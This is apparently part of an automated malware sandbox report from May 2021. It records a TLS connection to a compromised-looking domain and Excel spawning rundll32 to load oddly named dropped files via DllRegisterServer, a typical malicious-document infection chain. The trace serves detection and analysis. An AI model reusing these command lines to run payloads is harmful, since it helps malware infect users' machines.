                                                                            May 4, 2021 13:56:53.945460081 CEST192.185.5.2443192.168.2.749692CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:13:56:44
                                                                            Start date:04/05/2021
                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                            Imagebase:0xcc0000
                                                                            File size:27110184 bytes
                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:13:56:54
                                                                            Start date:04/05/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                            Imagebase:0xc90000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:13:56:54
                                                                            Start date:04/05/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                            Imagebase:0xc90000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >